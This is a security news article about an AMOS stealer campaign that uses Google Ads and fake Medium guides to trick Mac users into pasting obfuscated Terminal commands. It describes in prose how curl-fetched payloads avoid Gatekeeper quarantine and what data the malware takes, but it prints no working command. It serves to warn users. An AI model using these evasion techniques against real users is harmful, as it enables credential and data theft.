Google Search Results Deliver AMOS Stealer Malware to Mac Users
Mac users are currently compromising their own systems through a clever mix of Google Ads and malicious Terminal commands. This latest AMOS stealer campaign—often tracked as "SOMA"—was identified by security researchers Olena of Clario and Vladyslav Kolchin. It isn’t just a technical exploit; it’s a trap that preys on a user's willingness to follow technical guides to solve everyday problems.
docs.google.com, business.google.com, or medium.com. Because they appear as paid advertisements on trusted domains, they gain a level of trust that encourages clicks from unsuspecting users.Execution via Social Engineering and Terminal Exploits
AMOS succeeds by turning macOS's strengths against itself. Once a user clicks a malicious search result, they are directed to a page—often a fake guide on Medium—that instructs them to copy and paste a specific command into the Terminal. This command is heavily obfuscated with Base-64 encoding to hide its true intent from both the user and basic security scanners.
curl command. This is where the trick happens. By using curl to fetch payloads from a remote server, the malware sidesteps the macOS quarantine attribute entirely. Unlike files downloaded through a browser, which trigger Gatekeeper warnings, these payloads arrive without the metadata that usually alerts the system to an external origin. The malware then uses ad hoc signatures to run its malicious binaries once the user has been manipulated into providing administrative consent.Data Exfiltration and System Impact
Once it gains a foothold, AMOS moves fast. The malware immediately begins cloning the entire contents of the user’s Documents folder into a hidden directory named "FileGrabber." It also aggressively targets the macOS Notes application, seeking to exfiltrate private entries and sensitive information tucked away in the app.
To stay on the system, the malware writes several hidden files to the top level of the user's Home folder:
-
.agent: An AppleScript that manages the theft process.
-
.mainHelper: The primary Mach-O binary used for malicious operations.
-
.pass: A file containing the user’s password stored in plain text.
During the infection, users typically see legitimate system prompts asking for access to private data folders or apps. Granting these permissions is the final step that allows the exfiltration to proceed. Security analysis indicates that by the time these prompts appear, some sensitive data has often already been compromised.
Bypassing macOS Security Protections
The effectiveness of the AMOS campaign lies in its ability to render technical safeguards irrelevant. Modern macOS security is built to stop unauthorized code, but it is powerless when a user manually types the instructions. By convincing you to open the door yourself, the attackers make the system's native protections look the other way.
curl command in a suggested script from an unfamiliar source, treat it as a significant red flag.